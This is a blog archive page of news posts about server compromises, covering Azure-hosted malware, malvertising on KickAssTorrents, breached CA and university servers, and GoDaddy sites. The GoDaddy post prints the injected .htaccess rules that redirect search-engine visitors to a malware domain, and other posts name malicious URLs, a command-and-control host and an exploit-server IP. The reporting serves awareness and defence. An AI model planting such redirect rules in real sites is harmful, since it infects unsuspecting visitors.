Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Server Compromise. Show all posts

Secure your Home Server from being used as a Hacking Server by Crooks


SSH also referred to as Secure Shell, is a cryptographic network protocol which secures remote login from one computer to another. It is employed by almost all the Linux sysadmins and although Windows users are more acquainted with Remote Desktop Protocol (RDP), many of Window sysadmins also use SSH instead of RDP, the reason being its Raw power.

RDP provides full graphical remote control of a Windows computer to its users along with access to the regular Windows desktop through keyboard and mouse, whereas SSH, which is comparatively more genric, allows user to run almost every program remotely which further lets him administer the system automatically from a distance through pre-written scripts or by entering commands live, it also allows user to do both simultaneously.

Resultantly, cybercriminals who somehow can get access to a user's SSH password can also access his system, if not the entire network.

Network tunneling is another feature provided by SSH, wherein, users build an encrypted network connection between multiple computers, they start from one computer to another and extends that connection to a third system to carry out the online work.

SSH server also acts as a special-purpose VPN or encrypting proxy when it allows users to redirect network traffic when they are on the go.

Therefore, criminals who have access to any user's SSH password can use his server as the basis for his future attacks and the victims would be blaming the owner of the server.

Now, unfortunately, people have an SSH server at their home even if they don't realize it as home routers have a pre-configured SSH server which is placed for administrative reasons.

While hacking, cybercriminals do not differentiate between the SSH servers manages by users themselves and those managed by their ISP's, they go on exploiting regardless, as these servers can potentially allow them to breach data and make a profit via reselling it.

Users are advised to take the time to understand and get familiar with their router's configuration settings, in the cases where it is not managed by ISP. Furthermore, turn off all the features you don't require and also the ones you are not certain about. Lastly, ensure that you are using the latest version.




Hackers abusing Microsoft Azure to deploy malware

Now Microsoft Azure becomes a sweet spot for hackers to host powerful malware and also as a command and control server for sending and receiving commands to compromised systems.

Microsoft Azure is a cloud computing platform created by Microsoft for building, testing, deploying, and managing applications and services through Microsoft-managed data centers.

Initially, this malicious operation was uncovered and reported by @JayTHL & @malwrhunterteam via Twitter in which they provide the evidence that there is a malicious software being hosted in Microsoft Azure.

Researcher’s already reported this malicious operation to Microsoft. however, the original malware (plus additional samples uploaded since) still resided on the Azure site as of May 29, 2019 – 17 days later, Appriver Reported.

This is an evidence of Azure that failed to detect the malware residing on the Microsoft server, but Windows defender is detecting the malicious files if users attempt to download from the malware-hosting server.

Windows defender detects this malware as Trojan:Win32/Occamy.C and the first new sample ( searchfile.exe ) was initially uploaded to VirusTotal on April 26, 2019, and another sample (printer/prenter.exe) was first submitted on April 30, but also remains undetected on Azure servers.

According to appriver, however, it does not appear the service is currently scanning Azure sites or, one could surmise that these files would’ve been detected by now.

Based on the analysis report using the printer.exe file, attackers uncompiled this malware with the c# .net portable executable file.

Attackers cleverly using an uncompiled file as an attempt to evade the gateway and endpoint security detection by thoroughly examining the downloaded binaries.”

Once running, this malicious agent generates XML SOAP requests every 2 minutes to check-in and receive commands from the malicious actors Azure command and control site at: systemservicex[.]azurewebsites[.]net/data[.]asmx”

This is not a first-time malware operator abusing Azure, but already we reported that attackers abuse Microsoft Azure Blog Hosting and it also attempted to steal the login credentials.

North Korean hacked Email Accounts of Information Security School Students


Hackers breack into Information Security School server and compromised email accounts of alumni.  The National Intelligence Service investigated that North Korea was behind this hacking attack.  According to the report, They hacked e-mail accounts of 27 students of Korea University's Graduate School of Information Security.

"Analysis of the malware used to hack into the e-mail accounts confirmed that it is identical to malicious codes spread by North Korea," an NIS official said Wednesday. "We have tentatively concluded that North Korean hackers were behind the attack and are tracking the source."

The hackers send spam mail with malwares to alumni via the Korea University Center for Information Security Technologies. The investigation revealed that all of those who received it graduated in the same year. It appears that the hackers obtained the directory with all their email addresses and planted the malicious code.

The reason North Korea tried to hack into the e-mail accounts is because most of the school's graduates get jobs either at the Defense Ministry, NIS or other government security agency, intelligence officials believe.

SSL Certificate Authority KPN stopped issuing certificates

SSL(Secure Socket Layer) Certificate Authority , KPN stopped issuing certificates after the detection of DDOS Tool on Server.  KPN is Netherlands based SSL certificated provider.  They found DDOS tool on their server during the Security Audit, the tool may have been there for as long as four years.
"Although there is no evidence that the production of the certificate is compromised, can not be completely excluded that this did happen. Therefore, KPN Corporate Market (formerly Getronics) decided the application and issuance of new certificates temporarily discontinued, pending further investigation. This is to ensure that the certificates be issued optimal procedure is safe and reliable.

KPN has replaced the web servers. An additional, independent investigation takes place to ensure that KPN complies with the required safeguards, procedures and rules applicable to the issue of Internet safety certificates. Interior Ministry and Logius, agency e-government, are closely involved in the processA."  Said in official statement,translate to english.

Previously, Another Dutch Based Certificate authority, DigiNotar compromised by unknown attacker,issuing a huge number of fraudulent, but valid, certificates for high-value domains, including some belonging to Google, Yahoo, the CIA and others. This results in DigiNotar went out of Business and KPN get new customers from DigiNotar. But now KPN Server is Breached.

KPN has replaced the web servers. An additional, independent investigation takes place to ensure that KPN complies with the required safeguards, procedures and rules applicable to the issue of Internet safety certificates. Interior Ministry and Logius, agency e-government, are closely involved in the process.


Hackers breached MIT Server to launch cyber attack on other sites


Hackers Compromised MIT(Massachusetts Institute of Technology) Server in order to launch cyber attack on other sites.

"One MIT server (CSH-2.MIT.EDU) hosts a malicious script actively used by cyber-crooks to scan the web for vulnerable websites," BitDefender Researchers said.

The malicious script searched for vulnerable installations of phpMyAdmin, a popular Web-based database administration tool.

PHPMyAdmin is used by web developers and site administrators to connect and perform specific SQL operations over the web, such as creating, reading, updating and deleting information from the database. Our information shows that the vulnerable versions of PHPMyAdmin range from 2.5.6 to 2.8.

Once it find vulnerable version of phpMyAdmin , it launch SQL Injection attack to gain admin privileges. If the website is successfully compromised, the crawler leaves behind foler called "muieblackcat"- a mutex that acts as a mark of infection(Blackhole Exploit Pack).

BitDefender said that it tried to alert MIT about the security breach on their server, but received no reply.

According to BitDefender report the server is still online, but no longer attack any sites ." As a top level reliable domain, .edu is primarily used by educational institutions in America and other trustworthy organizations. A trackback from such a domain is a vote of confidence for an article, a blog, an entire site, or even an institution. In short, an infrastructure the size of MIT.edu is not only guaranteed to have huge bandwidth to carry thousands of malicious requests per second, but is also a good way to evade firewalls that obviously accept traffic from MIT.edu as legit." Doina Cosovan,BitDefender VirusAnalyst.


Japanese parliament's computers infected by Virus, an Cyber Attack


Japanese Parliment's computers infected by virus .  This gave access to Hackers. They Steal Confidential Data belonging to 480 lawmakers and their staff, for over a month.

As per the Report their servers are infected after a Trojan Horse was emailed to a a Lower House member in July. This Trojan Horse downloaded malware from Chinese based Server. This malware Spy on Email Communication and Steal confidential Data of Lawmakers and send to the attacker.








Last month, Mistubishi(Japan's Biggest Defense Contractor) server compromised and confidential data stolen such as such as fighter jets, as well as nuclear power plant design and safety plans.

KickAssTorrents(Kat.ph) infected and serving malware through Malvertising

A Famous Torrent website's(alexa Rank:321) KickAssTorrents(kat.ph) OpenX platform compromised, and served a fake antivirus "Security Sphere 2012" through malvertising(stands for malicious advertisement),detected by armorize.When the user click the ad, it will redirect to fake page. This page infects users without their knowledge.


Coincidentally, KickAss Torrents published a blog post on Oct 10th in response to the website being flagged by antivirus vendor Avast. In it they said:
===================
Our users that are using the Avast anti-virus might have noticed that KAT.ph suddenly became labeled as a dangerous website for users that are not logged in. We want to assure our users that KickassTorrents has no malware or viruses of any kind and it is absolutely safe to use our website. We already contacted Avast and currently we are trying to find and fix the cause of this problem. You will help us if you choose the "Report the file as a false positive" option if you get the alert.
===================

In another thread, KickAss Torrents said:

===================
Now what the hell does this error mean?
First of all, don't flip out, don't go post on the KAT site, post down here if you experience the same problem.
Secondly, report down here if you experience this error.
Thirdly, add kat.ph to the safe URLs in your AV.
And lastly, please go to this site and report the problem (Avast! users only):
Avast! forum thread
Back on topic. What is this error? Does error roughly means that your anti-virus software has found some bad code in an iFrame. This could be from the site itself, or from advertisements. An iFrame is a piece of code that allows you to do several things. Embedding something to your site is a good example.
I hope this topic helps a little and I certainly hope the error is going to be fixed now.
Q&A:
Q: OMFG IS KAT HACKED?
A: Nope, just some error.
Q: Is it really safe to visit KAT?
A: Yes, it is.
===================
KickAss Torrents also referred to this discussion thread on Avast's forum. At the end of the forum it appears that Avast has acknowledged that it was indeed a false positive and have addressed the issue:

===================
Hello,

It should be solved, if not let us know please.

Miroslav Jenšík
AVAST Software a.s.
===================

Well, that time it might have been a false positive from Avast, but this time the website is absolutely infecting its visitors, as seen in our video.


The attacker injected the malicious script using the following url:
http://ad.kat.ph/delivery/ajs.php?zoneid=4&target=_blank&charset=UTF-8&cb=95920847237&charset=UTF-8&loc=http%3A//www.kat.ph/§ion=1939940

At the time of detection , only 2 out of 42 detected the malware in virustotal analysis.

According to Armorize,this attacker is responsible for speedtest.net incident.

Using DynDNS domains for their exploit server. Domain names are auto-calculated using Javascript. The algorithm used generates a (predicable) different dyndns.tv domain name every hour, in the format of roboABCD.tv, where ABCD are characters with a fixed seed and incremented by one character every different UTC hour.

The new dyndns domain for the next hour is generated every hour precisely at minutes 2 to 5, so this may be done by an automated mechanism.

All generated domains resolve to a single IP: 184.22.224.154 (AS21788, United States Scranton Network Operations Center Inc), located in the US.

The domain: obama-president.com resolves to this IP and is serving the same exploit pack. This domain was registered on Aug 4th through an Russian registrar, 1'ST DOMAIN NAME SERVICE www.1dns.ru. At this time the domain resolved to an Netherlands IP 85.17.93.9. The domain started to resolve to 184.22.224.154 on Aug 23rd. This IP and the president-obama.com domain are both currently still up and working.

This video show how the users infected:



Sony Playstation Hacked Again - 93,000 accounts compromised

Sony Security officer informed that they  detected attempts on Sony Entertainment Network, PlayStation Network and Sony Online Entertainment (“Networks”) services to test a massive set of sign-in IDs and passwords against their network database.

These attempts appear to include a large amount of data obtained from one or more compromised lists from other companies, sites or other sources. In this case, given that the data tested against their network consisted of sign-in ID-password pairs, and that the overwhelming majority of the pairs resulted in failed matching attempts, it is likely the data came from another source and not from their Networks. They have taken steps to mitigate the activity.

Less than one tenth of one percent (0.1%) of our PSN, SEN and SOE audience may have been affected. There were approximately 93,000 accounts globally (PSN/SEN: approximately 60,000 accounts; SOE: approximately 33,000) where the attempts succeeded in verifying those accounts’ valid sign-in IDs and passwords, and we have temporarily locked these accounts. Only a small fraction of these 93,000 accounts showed additional activity prior to being locked.

Full Update is here:Sony hacked

Online Virus Removal Sites infected by malwares , infects visitors machine


One of the online Virus removal website laptopvirusrepair.co.uk infected by malwares and serves malware to visitors system. This site offers to pick up your infected laptop, clean it and then ship it back to you for a fee.

It is an obfuscated iframe that redirects to a site that will deliver exploits: zdesestvareznezahodi.com/tds/go.php?sid=1
The site is listed in malwareblacklist website.



Before considering others laptop security, they must consider their server security.  Now the most of their users affected by malware.  Gaining their trust again is not so easy.

 

GoDaddy shared servers compromised – .htaccess redirection to sokoloperkovuskeci.com

Many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to sokoloperkovuskeci.com.

After scanning website with sucuri.net tool, the researcher got this result:
Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105


This is caused by this entry that is added to the .htaccess file of the compromised sites:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

What is going on?

These redirections attacks are very common on outdated WordPress and Joomla sites, but this time (and for this specific malicious domain), the target is GoDaddy hosted sites.


What happens to anyone visiting these hacked sites?

The malware checks if anyone visiting the infected site is coming from a Google search (or Yahoo, or Bing) and if they are, redirects them to that domain (sokoloperkovuskeci.com). In there, the user gets redirected again to other locations to get their browsers infected too. So you have to fix your site asap to protect your own users.

check whether your site is infected by Malware or compromised:
http://sitecheck.sucuri.net/